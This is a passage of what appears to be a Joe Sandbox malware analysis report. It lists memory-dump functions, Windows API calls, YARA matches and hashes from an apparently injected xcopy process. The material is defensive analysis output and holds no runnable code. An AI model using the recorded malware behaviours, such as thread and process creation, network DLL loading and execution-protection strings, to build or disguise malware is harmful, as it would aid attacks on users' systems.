                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                  • Instruction ID: 4d5cb88fcb9aaca86b4eeae3b848100249106da5b1d884473dab1726db4d056d
                                  • Opcode Fuzzy Hash: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                  • Instruction Fuzzy Hash: 0D90026530550403E140B158541C6064059D7E2301F55D011F041C554CDA15895A6222
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                  • Instruction ID: 90f9624f825bf7237fea5a20dacd3c5df55794478c9084198d09e5465dc2aa5c
                                  • Opcode Fuzzy Hash: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                  • Instruction Fuzzy Hash: EC90027520550802E100B598540C646005987E1301F55D011B502C555EC76589957131
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                  • Instruction ID: dd18e2e52b5581243676347acb3fb548249b7245e213132097ffca177fd0e976
                                  • Opcode Fuzzy Hash: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                  • Instruction Fuzzy Hash: 6590027520558C02E110B158840874A005987D1301F59C411B442C658D879589957121
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                  • Instruction ID: f5614a289e56e2b8a2499c1e64956399490f12b58b6cc8add09c972754b4a413
                                  • Opcode Fuzzy Hash: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                  • Instruction Fuzzy Hash: 7C90027520550C42E100B1584408B46005987E1301F55C016B012C654D8715C9557521
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (legend: Executed / Not Executed): graph rendering not reproduced in this extraction; basic blocks 2f3937d-2f39c72, with calls to 2f31410, 2f50c10, 2f5ae57, 2f594f0 and CreateThread.
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F393C5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID: +m$.G$5$5F$?]$?}$H$Nc$W0$\$^$_$`$`7$`g$mW$nq$oB$t$t?$tP$u$uk$wn$k${
                                  • API String ID: 2422867632-396652899
                                  • Opcode ID: 806f9ad9c04d794bbc9c6ca1e6c34ba9ca1fab5b9037643310aafe1def2c8a5e
                                  • Instruction ID: 609ae681bce8f6169b0fd155b4758b26b512f7eb54031e3180d3f8f5aa618bdc
                                  • Opcode Fuzzy Hash: 806f9ad9c04d794bbc9c6ca1e6c34ba9ca1fab5b9037643310aafe1def2c8a5e
                                  • Instruction Fuzzy Hash: E69169B0905768DBEB608F91CD587DEBBB5BB45308F1085C9D14C2B281CBFA1A88CF91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph (legend: Executed / Not Executed): graph rendering not reproduced in this extraction; basic blocks 2f40292-2f402e2.
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: -507JlJ26-$-507JlJ26-
                                  • API String ID: 0-3526009599
                                  • Opcode ID: e0c84cdf72f43f094e65eba958582c6c91bd124cec880f01df2c83b1ba10d17c
                                  • Instruction ID: c3762452d62560907dd30eb4120ed87a46585ae12fd0e160687bf8a672e085db
                                  • Opcode Fuzzy Hash: e0c84cdf72f43f094e65eba958582c6c91bd124cec880f01df2c83b1ba10d17c
                                  • Instruction Fuzzy Hash: 0A41CB32A046896BDB169F709C41BAEBF64EF02660F1841DCDB905F1C2C7628107CBE1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 02F4040D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: -507JlJ26-$-507JlJ26-
                                  • API String ID: 1836367815-3526009599
                                  • Opcode ID: bd5f6ecebee1f5a3d025d621b6220d8d8e42cb5139b5d82c9a14f074082c5fc3
                                  • Instruction ID: 143a3519a15f8d14d68b4d1de61099c0a7afd7e8c32701408a6b4b49629fd91c
                                  • Opcode Fuzzy Hash: bd5f6ecebee1f5a3d025d621b6220d8d8e42cb5139b5d82c9a14f074082c5fc3
                                  • Instruction Fuzzy Hash: D011A171D4021876EB21A6A08D02FDFBF7C9F42B94F108058FB047B280EBB466068BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  • PostThreadMessageW.USER32(-507JlJ26-,00000111,00000000,00000000), ref: 02F4040D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: -507JlJ26-$-507JlJ26-
                                  • API String ID: 1836367815-3526009599
                                  • Opcode ID: 2c6daabdc6d6bfcf689982c441b5a8468a11718a030ea25bd265bda8a7925211
                                  • Instruction ID: 39847b296e7b5c8509a84638b65fa7e02add929a2f3206793955bb8478e0b3c8
                                  • Opcode Fuzzy Hash: 2c6daabdc6d6bfcf689982c441b5a8468a11718a030ea25bd265bda8a7925211
                                  • Instruction Fuzzy Hash: 2E018471D4021876EB2196A08D01FDF7B7C9F42B94F148159FF147B281DAB466068BE5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02F525BB
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 34fab4ee4296852ae495222b4d1a91441f26cb7c7719078568e57a4c7c6e3dc5
                                  • Instruction ID: c57350b158393f968c7a6f1e39cd84465b5fca143e5f116a5d831c2f3b312d75
                                  • Opcode Fuzzy Hash: 34fab4ee4296852ae495222b4d1a91441f26cb7c7719078568e57a4c7c6e3dc5
                                  • Instruction Fuzzy Hash: 8E316BB1600705ABD714EF64CC84FEBBBA9AB88740F00862DAB595B241D7B4B644CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02F4E577
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: dc9d5b5c3e7a07b5834272dba494bf296a77d88dff84a4439d815e1b8c97c2f9
                                  • Instruction ID: 970cdea31b4fee5ad0d0d2002ba33e5f53b51eab79b4052dfe4d0244274dc655
                                  • Opcode Fuzzy Hash: dc9d5b5c3e7a07b5834272dba494bf296a77d88dff84a4439d815e1b8c97c2f9
                                  • Instruction Fuzzy Hash: 774130B5A00209AFDB14DF98DC809EEB7B9BF88344B104559EA05E7214DB75EA45CFA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02F4E577
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: ef9a2403e39d2e2fcc99eb5a02bf28c086bd0bde8cd9ad9d096e8642442cdb39
                                  • Instruction ID: ed23dd923bbbb793a2dd6f83b0c4627f81d1c3876e04f515ff6e0e031ea2e354
                                  • Opcode Fuzzy Hash: ef9a2403e39d2e2fcc99eb5a02bf28c086bd0bde8cd9ad9d096e8642442cdb39
                                  • Instruction Fuzzy Hash: AD311075A1020ADFDB00DFD8D8809EEB7B9BF88344F108559EA15E7214DB75EE45CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F43DE2
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                  • Instruction ID: 77e80f4a2be0014920679e1f133da3ffebbcbd3d95a3df77d4d158bab5c1eefa
                                  • Opcode Fuzzy Hash: 5017eacf575fa66b987127cbb462bddf0181e3326ae4c73234eae0b8cd340783
                                  • Instruction Fuzzy Hash: 7E011EB5D0020DBBDB14EAE4DC41FDDB7B99B54348F104295EE0A97280FA71EB58CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02F47683,00000010,?,?,?,00000044,?,00000010,02F47683,?,?,?), ref: 02F57DC0
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: e3dc350ad7992f4025265e86a9489379d97c063344347db72ca276ed82ed7fd2
                                  • Instruction ID: 1feb720578d380b337494850ed4955e3bb62d3ca34eace0cc3834a004b67ae04
                                  • Opcode Fuzzy Hash: e3dc350ad7992f4025265e86a9489379d97c063344347db72ca276ed82ed7fd2
                                  • Instruction Fuzzy Hash: 030180B2214209BBCB54DE99DC80EEB77ADAF8D754F518208BA0DE3241D630FC518BA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02F43DE2
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 503d6485935eb4409dc0c3fc89d33c7c8b512331a68711aae755ee587567018a
                                  • Instruction ID: c98ddfe37884f026397901a13f7774d434ad309f4689f4dc80d986950d71d1e9
                                  • Opcode Fuzzy Hash: 503d6485935eb4409dc0c3fc89d33c7c8b512331a68711aae755ee587567018a
                                  • Instruction Fuzzy Hash: CFF062B5E4010EABDF14DA94DC45FD9B7B8AB44308F1081A5EE0D9B280FA70EA598B91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02F393C5
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 31223e0a56c9cf10eb80e593067b4cddbcc508904d54e0c6505bb47df1f57bed
                                  • Instruction ID: 2b5de52bb574b160b618716da61a0b10b8a30cf73052651a25b71c88616abe33
                                  • Opcode Fuzzy Hash: 31223e0a56c9cf10eb80e593067b4cddbcc508904d54e0c6505bb47df1f57bed
                                  • Instruction Fuzzy Hash: E6F0657338031436E32065AAEC02FDB729C9B85BA1F150426FB0CEB1C0D9D1B40146E4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,0B08E2C1,00000007,00000000,00000004,00000000,02F43649,000000F4,?,?,?,?,?), ref: 02F57D0C
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: 2a10095c7dd2379ca1bfe23ab2d869ab752011713d8de6f1dda4298a7a590373
                                  • Instruction ID: 2e6ff25d8090cede90961573c52ddcaaa0d0a2577b432fe9621225e875bdbe8a
                                  • Opcode Fuzzy Hash: 2a10095c7dd2379ca1bfe23ab2d869ab752011713d8de6f1dda4298a7a590373
                                  • Instruction Fuzzy Hash: 34E06D712002147BCA10EE59DC40FDB37AEEFC9750F004409FA09A7241C630B8108AB9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • RtlAllocateHeap.NTDLL(02F40FA9,?,02F545CF,02F40FA9,02F53FF7,02F545CF,?,02F40FA9,02F53FF7,00001000,?,?,02F59550), ref: 02F57CBF
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: fc8b3c178ccdfb88de354c7e46c3f6b4553945cf9241886c4d3a36b578cca239
                                  • Instruction ID: f1ad4130096eafc8762a8c202d44d1512e80688d7417966e5b3089b60695aabf
                                  • Opcode Fuzzy Hash: fc8b3c178ccdfb88de354c7e46c3f6b4553945cf9241886c4d3a36b578cca239
                                  • Instruction Fuzzy Hash: 65E065722102087BD620EE59DC44FEB33ADEFCA760F004029FA09A7240DA30B8108AB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetFileAttributesW.KERNELBASE(?), ref: 02F476EC
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: ef759eb556e0dccce8e8eda891e97e72bc6b72576dfc634ff8ce8142eb1d2185
                                  • Instruction ID: f7b550ce79d68e51e33e613c6e7f5d833db28a6b12717429a6436c412fdbdc87
                                  • Opcode Fuzzy Hash: ef759eb556e0dccce8e8eda891e97e72bc6b72576dfc634ff8ce8142eb1d2185
                                  • Instruction Fuzzy Hash: 2AE0263164030C27FB207ABCDC45F6637498B48768F284660BA1CDB2D1FFB8F4024690
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F41290,02F56717,02F53FF7,?), ref: 02F47503
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 228e171aa417770b844fc4500a1d0b7488ef939e3cac1194d3877d5fd3a7b548
                                  • Instruction ID: 1ef3089cb86d1956589b30d21c735ec4fec75f6c76c2fe36f0d16faeda53cd57
                                  • Opcode Fuzzy Hash: 228e171aa417770b844fc4500a1d0b7488ef939e3cac1194d3877d5fd3a7b548
                                  • Instruction Fuzzy Hash: 1EE0C2713802083BF600B6A5CC46F47364D9B053B4F058464FA4CEB2C2EA62F1008AA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,02F41290,02F56717,02F53FF7,?), ref: 02F47503
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3567612740.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_2f30000_xcopy.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: ae31f3cd9172aff2314a4b4e4396ca7be35de29213c0b4175995c50ee17a9a91
                                  • Instruction ID: 9a8997abece41ba28843804de2fa59b751a199e2c2b6a44915267dc0d2b1cae4
                                  • Opcode Fuzzy Hash: ae31f3cd9172aff2314a4b4e4396ca7be35de29213c0b4175995c50ee17a9a91
                                  • Instruction Fuzzy Hash: 1ED05E716803083BF600A6A5CD06F16328D5B457A4F058464FB4CEB2C2EDA6F10086A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                  • Instruction ID: 9aa265a707194c17db976279ef81c682fabbe7cf3295cd78f5aa45c5892c51dc
                                  • Opcode Fuzzy Hash: e0d3c395639694866ac7dc845fc11cfb8155f42fed0f70885cb23a79776bd885
                                  • Instruction Fuzzy Hash: 94B02B718019C4C5EA00E320060C7073D0867C0300F19C0A1E2034241E0738C0C0F171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                  • Instruction ID: 4ca9f1c3823cbee7e9676c5b4b86c01a0c4a7a7d248ffe36cdbd663ea6938b77
                                  • Opcode Fuzzy Hash: 0eb649ebbf3548d8df43d0789ceff5cfbc550e3c64e1c06ae1f98d8f26ebe946
                                  • Instruction Fuzzy Hash: 94510775A04206DFCB18CF69C5816AAFBF5FB48314B18856EE819A7345E734EA90CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                  • Instruction ID: 7f97f70fb92c0a32006e529ccf17c6c1982fa7c3d877b4351af333e02a760a32
                                  • Opcode Fuzzy Hash: 71d98fe0280a11b963c5e8ac4ab802ae3b13111d2fb0808ee18380fd8bd1af44
                                  • Instruction Fuzzy Hash: B8513BB5A005267FCB61DF98898097EFBBCBB492407148669E8A5D7745D334DE40C7E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  • ExecuteOptions, xrefs: 039546A0
                                  • Execute=1, xrefs: 03954713
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03954742
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03954787
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 039546FC
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03954725
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03954655
                                  Memory Dump Source
                                  • Source File: 00000016.00000002.3569211017.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                  • Associated: 00000016.00000002.3569211017.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000016.00000002.3569211017.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_22_2_38b0000_xcopy.jbxd
                                  Similarity
                                  • API ID:
